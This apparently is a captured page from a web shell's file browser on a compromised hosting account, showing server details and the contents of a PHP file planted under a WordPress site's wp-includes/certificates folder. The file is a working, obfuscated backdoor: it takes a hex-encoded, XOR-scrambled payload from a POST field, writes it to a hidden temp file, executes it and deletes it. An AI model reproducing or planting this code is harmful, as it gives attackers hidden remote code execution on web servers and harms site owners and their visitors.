HEX
Server: Apache
System: Linux host17.zseohosting.com 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User: z22293cp218470 (1362)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/z22293cp218470/public_html/wp-includes/certificates/comment-section-1756286198.php
<!--AgKn4qEw-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_POST))){
$flg = hex2bin($_POST["\x66\x61\x63tor"]);
$obj =''; $m=0;while($m<strlen($flg)){$obj.=chr(ord($flg[$m])^75);$m++;}
$resource = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
foreach ($resource as $key => $marker) {
            if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
            $object = vsprintf("%s/%s", [$marker, ".component"]);
            if (false !== file_put_contents($object, $obj)) {
    include_once $object;
    @unlink($object);
    exit;
}
        }
}
}